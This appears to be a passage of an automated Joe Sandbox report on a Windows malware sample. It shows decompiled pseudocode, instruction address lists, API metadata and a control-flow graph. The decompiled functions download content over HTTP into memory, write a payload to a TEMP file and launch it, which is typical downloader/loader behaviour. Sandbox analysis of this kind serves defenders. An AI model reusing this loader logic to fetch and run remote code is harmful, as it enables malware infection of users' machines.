                                                                                                                                                                                                                                                                                          											 *(_v624 + 0x18) = _v620;
                                                                                                                                                                                                                                                                                          											_v628 = CreateThread(0, 0, E04006DA0, _v624, 0, 0);
                                                                                                                                                                                                                                                                                          											CloseHandle(_v628);
                                                                                                                                                                                                                                                                                          											goto L24;
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          										goto L24;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L24;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags =  *((intOrPtr*)(_v20 + 8)) -  *0x400e284; // 0x1
                                                                                                                                                                                                                                                                                          								if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								GetEnvironmentVariableA("TEMP",  &_v604, 0x104);
                                                                                                                                                                                                                                                                                          								E04007D20( &_v340,  &_v340, 0, 0xa);
                                                                                                                                                                                                                                                                                          								E04009730( &_v340, 4);
                                                                                                                                                                                                                                                                                          								_t598 = _t598 + 0x14;
                                                                                                                                                                                                                                                                                          								GetTempFileNameA( &_v604,  &_v340, GetTickCount() % 0xffff,  &_v324);
                                                                                                                                                                                                                                                                                          								_v328 = CreateFileA( &_v324, 0x40000000, 1, 0, 2, 0x80, 0);
                                                                                                                                                                                                                                                                                          								__eflags = _v328 - 0xffffffff;
                                                                                                                                                                                                                                                                                          								if(_v328 == 0xffffffff) {
                                                                                                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v608 = 0;
                                                                                                                                                                                                                                                                                          								_v612 = 0;
                                                                                                                                                                                                                                                                                          								_t415 = WriteFile(_v328, _v52, _v56,  &_v612, 0);
                                                                                                                                                                                                                                                                                          								__eflags = _t415;
                                                                                                                                                                                                                                                                                          								if(_t415 == 0) {
                                                                                                                                                                                                                                                                                          									L37:
                                                                                                                                                                                                                                                                                          									__eflags = _v608;
                                                                                                                                                                                                                                                                                          									if(_v608 == 0) {
                                                                                                                                                                                                                                                                                          										CloseHandle(_v328);
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									goto L39;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								__eflags = _v612 - _v56;
                                                                                                                                                                                                                                                                                          								if(_v612 != _v56) {
                                                                                                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								_v608 = CloseHandle(_v328);
                                                                                                                                                                                                                                                                                          								E04006C60();
                                                                                                                                                                                                                                                                                          								_t421 = E04001E60( &_v324);
                                                                                                                                                                                                                                                                                          								_t598 = _t598 + 4;
                                                                                                                                                                                                                                                                                          								_v616 = _t421;
                                                                                                                                                                                                                                                                                          								__eflags = _v616;
                                                                                                                                                                                                                                                                                          								if(_v616 == 0) {
                                                                                                                                                                                                                                                                                          									E04006CF0();
                                                                                                                                                                                                                                                                                          									goto L37;
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								E040074A0();
                                                                                                                                                                                                                                                                                          								ExitProcess(0);
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							_v60 =  *_v20;
                                                                                                                                                                                                                                                                                          							_v20 = _v20 + _v60;
                                                                                                                                                                                                                                                                                          							__eflags = _v20 - _a4 + _a8;
                                                                                                                                                                                                                                                                                          							if(_v20 <= _a4 + _a8) {
                                                                                                                                                                                                                                                                                          								goto L29;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							return 0;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						__eflags = (_v13 & 0x000000ff) - 1;
                                                                                                                                                                                                                                                                                          						if((_v13 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                                          							 *0x40130e4 = 1;
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							 *0x40130e4 = 2;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          					goto L99;
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}
















































































                                                                                                                                                                                                                                                                                          0x040062b9
                                                                                                                                                                                                                                                                                          0x040062c4
                                                                                                                                                                                                                                                                                          0x04006c4e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040062d4
                                                                                                                                                                                                                                                                                          0x040062d9
                                                                                                                                                                                                                                                                                          0x040062e0
                                                                                                                                                                                                                                                                                          0x040062f9
                                                                                                                                                                                                                                                                                          0x040062fc
                                                                                                                                                                                                                                                                                          0x0400630e
                                                                                                                                                                                                                                                                                          0x0400631e
                                                                                                                                                                                                                                                                                          0x04006343
                                                                                                                                                                                                                                                                                          0x04006349
                                                                                                                                                                                                                                                                                          0x04006354
                                                                                                                                                                                                                                                                                          0x0400635d
                                                                                                                                                                                                                                                                                          0x04006363
                                                                                                                                                                                                                                                                                          0x04006429
                                                                                                                                                                                                                                                                                          0x04006308
                                                                                                                                                                                                                                                                                          0x04006308
                                                                                                                                                                                                                                                                                          0x0400630b
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400630b
                                                                                                                                                                                                                                                                                          0x0400636f
                                                                                                                                                                                                                                                                                          0x04006375
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400637b
                                                                                                                                                                                                                                                                                          0x04006381
                                                                                                                                                                                                                                                                                          0x04006384
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006391
                                                                                                                                                                                                                                                                                          0x04006393
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006399
                                                                                                                                                                                                                                                                                          0x0400639f
                                                                                                                                                                                                                                                                                          0x040063a2
                                                                                                                                                                                                                                                                                          0x04006419
                                                                                                                                                                                                                                                                                          0x0400641e
                                                                                                                                                                                                                                                                                          0x04006424
                                                                                                                                                                                                                                                                                          0x04006427
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006427
                                                                                                                                                                                                                                                                                          0x040063ad
                                                                                                                                                                                                                                                                                          0x040063c3
                                                                                                                                                                                                                                                                                          0x040063c6
                                                                                                                                                                                                                                                                                          0x040063ca
                                                                                                                                                                                                                                                                                          0x0400640e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400640e
                                                                                                                                                                                                                                                                                          0x040063dc
                                                                                                                                                                                                                                                                                          0x040063e1
                                                                                                                                                                                                                                                                                          0x040063e4
                                                                                                                                                                                                                                                                                          0x040063ef
                                                                                                                                                                                                                                                                                          0x040063f4
                                                                                                                                                                                                                                                                                          0x040063fa
                                                                                                                                                                                                                                                                                          0x040063fa
                                                                                                                                                                                                                                                                                          0x04006408
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006320
                                                                                                                                                                                                                                                                                          0x04006325
                                                                                                                                                                                                                                                                                          0x0400632e
                                                                                                                                                                                                                                                                                          0x0400633a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400633c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400633c
                                                                                                                                                                                                                                                                                          0x0400633a
                                                                                                                                                                                                                                                                                          0x0400631e
                                                                                                                                                                                                                                                                                          0x0400642e
                                                                                                                                                                                                                                                                                          0x04006438
                                                                                                                                                                                                                                                                                          0x0400643b
                                                                                                                                                                                                                                                                                          0x0400644d
                                                                                                                                                                                                                                                                                          0x04006450
                                                                                                                                                                                                                                                                                          0x04006453
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006459
                                                                                                                                                                                                                                                                                          0x0400645d
                                                                                                                                                                                                                                                                                          0x04006482
                                                                                                                                                                                                                                                                                          0x04006488
                                                                                                                                                                                                                                                                                          0x04006493
                                                                                                                                                                                                                                                                                          0x0400649c
                                                                                                                                                                                                                                                                                          0x040064a2
                                                                                                                                                                                                                                                                                          0x040065f3
                                                                                                                                                                                                                                                                                          0x040065f3
                                                                                                                                                                                                                                                                                          0x040065f9
                                                                                                                                                                                                                                                                                          0x040065fc
                                                                                                                                                                                                                                                                                          0x04006609
                                                                                                                                                                                                                                                                                          0x0400660f
                                                                                                                                                                                                                                                                                          0x04006bdd
                                                                                                                                                                                                                                                                                          0x04006be3
                                                                                                                                                                                                                                                                                          0x04006be9
                                                                                                                                                                                                                                                                                          0x04006c18
                                                                                                                                                                                                                                                                                          0x04006c1e
                                                                                                                                                                                                                                                                                          0x04006c24
                                                                                                                                                                                                                                                                                          0x04006c26
                                                                                                                                                                                                                                                                                          0x04006c26
                                                                                                                                                                                                                                                                                          0x04006c2a
                                                                                                                                                                                                                                                                                          0x04006444
                                                                                                                                                                                                                                                                                          0x04006447
                                                                                                                                                                                                                                                                                          0x04006447
                                                                                                                                                                                                                                                                                          0x0400644a
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400644a
                                                                                                                                                                                                                                                                                          0x04006bf1
                                                                                                                                                                                                                                                                                          0x04006bf7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006c01
                                                                                                                                                                                                                                                                                          0x04006c07
                                                                                                                                                                                                                                                                                          0x04006c0e
                                                                                                                                                                                                                                                                                          0x04006c13
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006c13
                                                                                                                                                                                                                                                                                          0x0400661b
                                                                                                                                                                                                                                                                                          0x04006621
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006633
                                                                                                                                                                                                                                                                                          0x04006638
                                                                                                                                                                                                                                                                                          0x0400663e
                                                                                                                                                                                                                                                                                          0x04006640
                                                                                                                                                                                                                                                                                          0x04006647
                                                                                                                                                                                                                                                                                          0x0400664a
                                                                                                                                                                                                                                                                                          0x0400664e
                                                                                                                                                                                                                                                                                          0x04006752
                                                                                                                                                                                                                                                                                          0x04006752
                                                                                                                                                                                                                                                                                          0x04006758
                                                                                                                                                                                                                                                                                          0x0400675b
                                                                                                                                                                                                                                                                                          0x040069cb
                                                                                                                                                                                                                                                                                          0x040069dc
                                                                                                                                                                                                                                                                                          0x040069ed
                                                                                                                                                                                                                                                                                          0x040069f2
                                                                                                                                                                                                                                                                                          0x04006a1a
                                                                                                                                                                                                                                                                                          0x04006a3c
                                                                                                                                                                                                                                                                                          0x04006a42
                                                                                                                                                                                                                                                                                          0x04006a49
                                                                                                                                                                                                                                                                                          0x04006bd6
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006bd6
                                                                                                                                                                                                                                                                                          0x04006a4f
                                                                                                                                                                                                                                                                                          0x04006a59
                                                                                                                                                                                                                                                                                          0x04006a66
                                                                                                                                                                                                                                                                                          0x04006a6c
                                                                                                                                                                                                                                                                                          0x04006a72
                                                                                                                                                                                                                                                                                          0x04006a75
                                                                                                                                                                                                                                                                                          0x04006b3c
                                                                                                                                                                                                                                                                                          0x04006a7b
                                                                                                                                                                                                                                                                                          0x04006a84
                                                                                                                                                                                                                                                                                          0x04006aa0
                                                                                                                                                                                                                                                                                          0x04006aa6
                                                                                                                                                                                                                                                                                          0x04006aad
                                                                                                                                                                                                                                                                                          0x04006ac5
                                                                                                                                                                                                                                                                                          0x04006aca
                                                                                                                                                                                                                                                                                          0x04006ad0
                                                                                                                                                                                                                                                                                          0x04006af6
                                                                                                                                                                                                                                                                                          0x04006b02
                                                                                                                                                                                                                                                                                          0x04006b02
                                                                                                                                                                                                                                                                                          0x04006b16
                                                                                                                                                                                                                                                                                          0x04006b16
                                                                                                                                                                                                                                                                                          0x04006b1c
                                                                                                                                                                                                                                                                                          0x04006b42
                                                                                                                                                                                                                                                                                          0x04006b49
                                                                                                                                                                                                                                                                                          0x04006bc9
                                                                                                                                                                                                                                                                                          0x04006bd0
                                                                                                                                                                                                                                                                                          0x04006b4b
                                                                                                                                                                                                                                                                                          0x04006b51
                                                                                                                                                                                                                                                                                          0x04006b57
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006b60
                                                                                                                                                                                                                                                                                          0x04006b6d
                                                                                                                                                                                                                                                                                          0x04006b72
                                                                                                                                                                                                                                                                                          0x04006b75
                                                                                                                                                                                                                                                                                          0x04006b7b
                                                                                                                                                                                                                                                                                          0x04006b82
                                                                                                                                                                                                                                                                                          0x04006b84
                                                                                                                                                                                                                                                                                          0x04006b87
                                                                                                                                                                                                                                                                                          0x04006b8b
                                                                                                                                                                                                                                                                                          0x04006b99
                                                                                                                                                                                                                                                                                          0x04006b9e
                                                                                                                                                                                                                                                                                          0x04006b9e
                                                                                                                                                                                                                                                                                          0x04006ba1
                                                                                                                                                                                                                                                                                          0x04006ba7
                                                                                                                                                                                                                                                                                          0x04006baa
                                                                                                                                                                                                                                                                                          0x04006bb8
                                                                                                                                                                                                                                                                                          0x04006bbd
                                                                                                                                                                                                                                                                                          0x04006bbd
                                                                                                                                                                                                                                                                                          0x04006bc0
                                                                                                                                                                                                                                                                                          0x04006bc0
                                                                                                                                                                                                                                                                                          0x04006bc7
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006b49
                                                                                                                                                                                                                                                                                          0x04006761
                                                                                                                                                                                                                                                                                          0x0400676b
                                                                                                                                                                                                                                                                                          0x04006775
                                                                                                                                                                                                                                                                                          0x0400677f
                                                                                                                                                                                                                                                                                          0x04006785
                                                                                                                                                                                                                                                                                          0x04006788
                                                                                                                                                                                                                                                                                          0x0400685c
                                                                                                                                                                                                                                                                                          0x04006861
                                                                                                                                                                                                                                                                                          0x04006864
                                                                                                                                                                                                                                                                                          0x0400678e
                                                                                                                                                                                                                                                                                          0x04006797
                                                                                                                                                                                                                                                                                          0x040067ad
                                                                                                                                                                                                                                                                                          0x040067b3
                                                                                                                                                                                                                                                                                          0x040067b9
                                                                                                                                                                                                                                                                                          0x040067c0
                                                                                                                                                                                                                                                                                          0x040067dc
                                                                                                                                                                                                                                                                                          0x040067e1
                                                                                                                                                                                                                                                                                          0x040067e7
                                                                                                                                                                                                                                                                                          0x040067f0
                                                                                                                                                                                                                                                                                          0x040067f5
                                                                                                                                                                                                                                                                                          0x040067f8
                                                                                                                                                                                                                                                                                          0x040067fe
                                                                                                                                                                                                                                                                                          0x04006804
                                                                                                                                                                                                                                                                                          0x04006807
                                                                                                                                                                                                                                                                                          0x04006819
                                                                                                                                                                                                                                                                                          0x0400681f
                                                                                                                                                                                                                                                                                          0x0400683a
                                                                                                                                                                                                                                                                                          0x0400683f
                                                                                                                                                                                                                                                                                          0x0400683f
                                                                                                                                                                                                                                                                                          0x04006807
                                                                                                                                                                                                                                                                                          0x04006850
                                                                                                                                                                                                                                                                                          0x04006850
                                                                                                                                                                                                                                                                                          0x04006856
                                                                                                                                                                                                                                                                                          0x0400686a
                                                                                                                                                                                                                                                                                          0x04006871
                                                                                                                                                                                                                                                                                          0x04006877
                                                                                                                                                                                                                                                                                          0x0400687a
                                                                                                                                                                                                                                                                                          0x0400687e
                                                                                                                                                                                                                                                                                          0x0400688c
                                                                                                                                                                                                                                                                                          0x04006891
                                                                                                                                                                                                                                                                                          0x04006891
                                                                                                                                                                                                                                                                                          0x04006894
                                                                                                                                                                                                                                                                                          0x0400689a
                                                                                                                                                                                                                                                                                          0x0400689d
                                                                                                                                                                                                                                                                                          0x040068a5
                                                                                                                                                                                                                                                                                          0x040068aa
                                                                                                                                                                                                                                                                                          0x040068ad
                                                                                                                                                                                                                                                                                          0x040068b9
                                                                                                                                                                                                                                                                                          0x040068bf
                                                                                                                                                                                                                                                                                          0x040068c5
                                                                                                                                                                                                                                                                                          0x040068c8
                                                                                                                                                                                                                                                                                          0x04006902
                                                                                                                                                                                                                                                                                          0x0400690a
                                                                                                                                                                                                                                                                                          0x0400690d
                                                                                                                                                                                                                                                                                          0x04006920
                                                                                                                                                                                                                                                                                          0x04006925
                                                                                                                                                                                                                                                                                          0x04006931
                                                                                                                                                                                                                                                                                          0x04006931
                                                                                                                                                                                                                                                                                          0x040068ca
                                                                                                                                                                                                                                                                                          0x040068d6
                                                                                                                                                                                                                                                                                          0x040068e4
                                                                                                                                                                                                                                                                                          0x040068e4
                                                                                                                                                                                                                                                                                          0x0400693a
                                                                                                                                                                                                                                                                                          0x0400693d
                                                                                                                                                                                                                                                                                          0x0400694b
                                                                                                                                                                                                                                                                                          0x0400695a
                                                                                                                                                                                                                                                                                          0x04006971
                                                                                                                                                                                                                                                                                          0x04006977
                                                                                                                                                                                                                                                                                          0x04006984
                                                                                                                                                                                                                                                                                          0x04006984
                                                                                                                                                                                                                                                                                          0x0400693d
                                                                                                                                                                                                                                                                                          0x0400698a
                                                                                                                                                                                                                                                                                          0x04006990
                                                                                                                                                                                                                                                                                          0x04006993
                                                                                                                                                                                                                                                                                          0x040069a1
                                                                                                                                                                                                                                                                                          0x040069a6
                                                                                                                                                                                                                                                                                          0x040069a6
                                                                                                                                                                                                                                                                                          0x040069a9
                                                                                                                                                                                                                                                                                          0x040069a9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040069b0
                                                                                                                                                                                                                                                                                          0x04006667
                                                                                                                                                                                                                                                                                          0x0400666d
                                                                                                                                                                                                                                                                                          0x04006674
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006689
                                                                                                                                                                                                                                                                                          0x04006693
                                                                                                                                                                                                                                                                                          0x04006698
                                                                                                                                                                                                                                                                                          0x0400669b
                                                                                                                                                                                                                                                                                          0x040066a7
                                                                                                                                                                                                                                                                                          0x040066b8
                                                                                                                                                                                                                                                                                          0x040066c6
                                                                                                                                                                                                                                                                                          0x040066d5
                                                                                                                                                                                                                                                                                          0x040066e4
                                                                                                                                                                                                                                                                                          0x040066f0
                                                                                                                                                                                                                                                                                          0x040066ff
                                                                                                                                                                                                                                                                                          0x0400670e
                                                                                                                                                                                                                                                                                          0x0400671d
                                                                                                                                                                                                                                                                                          0x0400673a
                                                                                                                                                                                                                                                                                          0x04006747
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006747
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006642
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040065fe
                                                                                                                                                                                                                                                                                          0x040064ae
                                                                                                                                                                                                                                                                                          0x040064b4
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040064cb
                                                                                                                                                                                                                                                                                          0x040064dc
                                                                                                                                                                                                                                                                                          0x040064ed
                                                                                                                                                                                                                                                                                          0x040064f2
                                                                                                                                                                                                                                                                                          0x0400651a
                                                                                                                                                                                                                                                                                          0x0400653f
                                                                                                                                                                                                                                                                                          0x04006545
                                                                                                                                                                                                                                                                                          0x0400654c
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x04006552
                                                                                                                                                                                                                                                                                          0x0400655c
                                                                                                                                                                                                                                                                                          0x0400657e
                                                                                                                                                                                                                                                                                          0x04006584
                                                                                                                                                                                                                                                                                          0x04006586
                                                                                                                                                                                                                                                                                          0x040065dd
                                                                                                                                                                                                                                                                                          0x040065dd
                                                                                                                                                                                                                                                                                          0x040065e4
                                                                                                                                                                                                                                                                                          0x040065ed
                                                                                                                                                                                                                                                                                          0x040065ed
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040065e4
                                                                                                                                                                                                                                                                                          0x0400658e
                                                                                                                                                                                                                                                                                          0x04006591
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040065a0
                                                                                                                                                                                                                                                                                          0x040065a6
                                                                                                                                                                                                                                                                                          0x040065b2
                                                                                                                                                                                                                                                                                          0x040065b7
                                                                                                                                                                                                                                                                                          0x040065ba
                                                                                                                                                                                                                                                                                          0x040065c0
                                                                                                                                                                                                                                                                                          0x040065c7
                                                                                                                                                                                                                                                                                          0x040065d8
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040065d8
                                                                                                                                                                                                                                                                                          0x040065c9
                                                                                                                                                                                                                                                                                          0x040065d0
                                                                                                                                                                                                                                                                                          0x040065d0
                                                                                                                                                                                                                                                                                          0x04006464
                                                                                                                                                                                                                                                                                          0x0400646d
                                                                                                                                                                                                                                                                                          0x04006476
                                                                                                                                                                                                                                                                                          0x04006479
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x0400647b
                                                                                                                                                                                                                                                                                          0x04006c33
                                                                                                                                                                                                                                                                                          0x04006c36
                                                                                                                                                                                                                                                                                          0x04006c44
                                                                                                                                                                                                                                                                                          0x04006c38
                                                                                                                                                                                                                                                                                          0x04006c38
                                                                                                                                                                                                                                                                                          0x04006c38
                                                                                                                                                                                                                                                                                          0x04006c36
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x040062e0

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 040063BD
                                                                                                                                                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,00000000,?), ref: 04006408
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000001.00000002.727052256.0000000004001000.00000020.00001000.00020000.00000000.sdmp, Offset: 04000000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727020045.0000000004000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727132204.000000000400C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000001.00000002.727164191.000000000400E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_4000000_pigalicapi.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Virtual$AllocFree
                                                                                                                                                                                                                                                                                          • String ID: TEMP$TEMP$Vatwyovatk
                                                                                                                                                                                                                                                                                          • API String ID: 2087232378-1226953995
                                                                                                                                                                                                                                                                                          • Opcode ID: 163a6c67a9ad4a050b6a0ddf75bfa28f589bd25aa1d8280bf8524ef74e6305bb
                                                                                                                                                                                                                                                                                          • Instruction ID: 78f313c43f0008814aaec3ee7e7f4a65c37c9c75159239be5687e4ed3a221f5b
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 163a6c67a9ad4a050b6a0ddf75bfa28f589bd25aa1d8280bf8524ef74e6305bb
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 70522BB5A042199FEB54DF94DC88FAEB7B6FB48304F148598E509BB280D775AE80CF50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                                                                                                                          • Executed
                                                                                                                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                                                                                                                          control_flow_graph 450 4001840-4001854 451 4001c95-4001c9b 450->451 452 400185a-400185e 450->452 452->451 453 4001864-4001868 452->453 453->451 454 400186e-4001872 453->454 454->451 455 4001878-400190a call 4007d20 InternetCrackUrlA 454->455 455->451 458 4001910-4001930 InternetOpenA 455->458 458->451 459 4001936-4001969 InternetConnectA 458->459 460 4001c88-4001c8f InternetCloseHandle 459->460 461 400196f-40019a7 HttpOpenRequestA 459->461 460->451 462 4001c7b-4001c82 InternetCloseHandle 461->462 463 40019ad-40019e5 wnsprintfA HttpAddRequestHeadersA 461->463 462->460 464 40019eb-40019f9 463->464 465 4001c6e-4001c75 InternetCloseHandle 463->465 466 4001a04-4001a26 InternetSetOptionA 464->466 467 40019fb-40019fe 464->467 465->462 468 4001a30-4001a75 call 4007d20 HttpSendRequestA 466->468 467->466 471 4001a7b-4001aa1 HttpQueryInfoA 468->471 472 4001c4c-4001c5f 468->472 473 4001aa3-4001abc call 4007dd0 471->473 474 4001ac9-4001b0f call 4007d20 HttpQueryInfoA 471->474 472->465 475 4001c61-4001c68 472->475 473->474 480 4001abe-4001ac7 473->480 481 4001b11-4001b2d call 4007dd0 474->481 482 4001b47-4001b6a VirtualAlloc 474->482 475->465 475->468 480->474 481->482 489 4001b2f-4001b39 481->489 483 4001b70-4001b93 482->483 484 4001c19 482->484 486 4001b99-4001bc9 InternetReadFile 483->486 487 4001c23-4001c4a InternetReadFile 484->487 490 4001bdb-4001be2 486->490 491 4001bcb-4001bd9 486->491 487->472 487->487 489->482 492 4001b3b-4001b41 489->492 493 4001be4 490->493 494 4001be6-4001c11 490->494 491->490 492->482 495 4001c17 493->495 496 4001c13 494->496 497 4001c15 494->497 495->472 496->495 497->486
                                                                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                                                                          			E04001840(char* _a4, void* _a8, long _a12, intOrPtr* _a16, intOrPtr* _a20, intOrPtr* _a24, intOrPtr _a28, intOrPtr* _a32) {
                                                                                                                                                                                                                                                                                          				long _v8;
                                                                                                                                                                                                                                                                                          				char _v276;
                                                                                                                                                                                                                                                                                          				char _v1300;
                                                                                                                                                                                                                                                                                          				char _v1564;
                                                                                                                                                                                                                                                                                          				void* _v1568;
                                                                                                                                                                                                                                                                                          				void* _v1572;
                                                                                                                                                                                                                                                                                          				char* _v1576;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1588;
                                                                                                                                                                                                                                                                                          				char* _v1592;
                                                                                                                                                                                                                                                                                          				signed short _v1612;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1616;
                                                                                                                                                                                                                                                                                          				char* _v1620;
                                                                                                                                                                                                                                                                                          				void* _v1636;
                                                                                                                                                                                                                                                                                          				void* _v1640;
                                                                                                                                                                                                                                                                                          				void* _v1644;
                                                                                                                                                                                                                                                                                          				void* _v1648;
                                                                                                                                                                                                                                                                                          				long _v1652;
                                                                                                                                                                                                                                                                                          				void _v1656;
                                                                                                                                                                                                                                                                                          				void _v1916;
                                                                                                                                                                                                                                                                                          				long _v1920;
                                                                                                                                                                                                                                                                                          				long _v1924;
                                                                                                                                                                                                                                                                                          				long _v1928;
                                                                                                                                                                                                                                                                                          				void* _v1932;
                                                                                                                                                                                                                                                                                          				intOrPtr _v1936;
                                                                                                                                                                                                                                                                                          				long _v1940;
                                                                                                                                                                                                                                                                                          				long _v1944;
                                                                                                                                                                                                                                                                                          				long _v1948;
                                                                                                                                                                                                                                                                                          				void _v2972;
                                                                                                                                                                                                                                                                                          				long _v2976;
                                                                                                                                                                                                                                                                                          				int _t116;
                                                                                                                                                                                                                                                                                          				void* _t117;
                                                                                                                                                                                                                                                                                          				void* _t119;
                                                                                                                                                                                                                                                                                          				void* _t123;
                                                                                                                                                                                                                                                                                          				int _t133;
                                                                                                                                                                                                                                                                                          				void* _t143;
                                                                                                                                                                                                                                                                                          				long _t151;
                                                                                                                                                                                                                                                                                          				void* _t194;
                                                                                                                                                                                                                                                                                          				void* _t195;
                                                                                                                                                                                                                                                                                          				void* _t196;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				if(_a4 == 0 || _a8 == 0 || _a12 == 0 || _a16 == 0) {
                                                                                                                                                                                                                                                                                          					L37:
                                                                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_v1644 = 0;
                                                                                                                                                                                                                                                                                          					_v1640 = 0;
                                                                                                                                                                                                                                                                                          					_v1568 = 0;
                                                                                                                                                                                                                                                                                          					_v1576 = "*/*";
                                                                                                                                                                                                                                                                                          					_v1572 = 0;
                                                                                                                                                                                                                                                                                          					E04007D20( &_v1636,  &_v1636, 0, 0x3c);
                                                                                                                                                                                                                                                                                          					_t195 = _t194 + 0xc;
                                                                                                                                                                                                                                                                                          					_v1636 = 0x3c;
                                                                                                                                                                                                                                                                                          					_v1620 =  &_v1564;
                                                                                                                                                                                                                                                                                          					_v1616 = 0x104;
                                                                                                                                                                                                                                                                                          					_v1592 =  &_v276;
                                                                                                                                                                                                                                                                                          					_v1588 = 0x104;
                                                                                                                                                                                                                                                                                          					_t116 = InternetCrackUrlA(_a4, 0, 0,  &_v1636); // executed
                                                                                                                                                                                                                                                                                          					if(_t116 == 0) {
                                                                                                                                                                                                                                                                                          						goto L37;
                                                                                                                                                                                                                                                                                          					}
